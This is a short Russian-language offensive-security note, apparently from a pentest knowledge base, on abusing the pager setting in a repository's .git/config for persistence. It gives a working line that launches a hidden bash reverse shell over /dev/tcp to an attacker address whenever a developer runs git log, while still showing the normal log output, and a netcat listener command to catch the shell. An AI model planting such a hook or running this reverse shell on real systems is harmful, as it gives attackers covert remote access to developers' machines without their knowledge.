# 11 - Git config

В .git/config есть переменные среды, их можно настроить на выполнение вредоносных команд, когда должно произойти какое-либо действие.\
Для git log  соответствует переменная среды GIT\_PAGER.

```bash
// Правим .git/config
pager = nohup bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1' > /dev/null 2>&1 & ${PAGER:-less}

// На атакующем хосте поднимаем netcat 
nc -vln 9010
```

теперь когда разраотчик вызовет git log, он увидит лог, а мы получим шелл

<figure><img src="https://2826317613-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyxXcvCa5Rbt6bHhLblf7%2Fuploads%2Fk7G2fcVg1sbgyAlZpl6y%2F%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5.png?alt=media&#x26;token=a13a7297-48c2-4e85-b8ed-6a79ca25bbe7" alt=""><figcaption></figcaption></figure>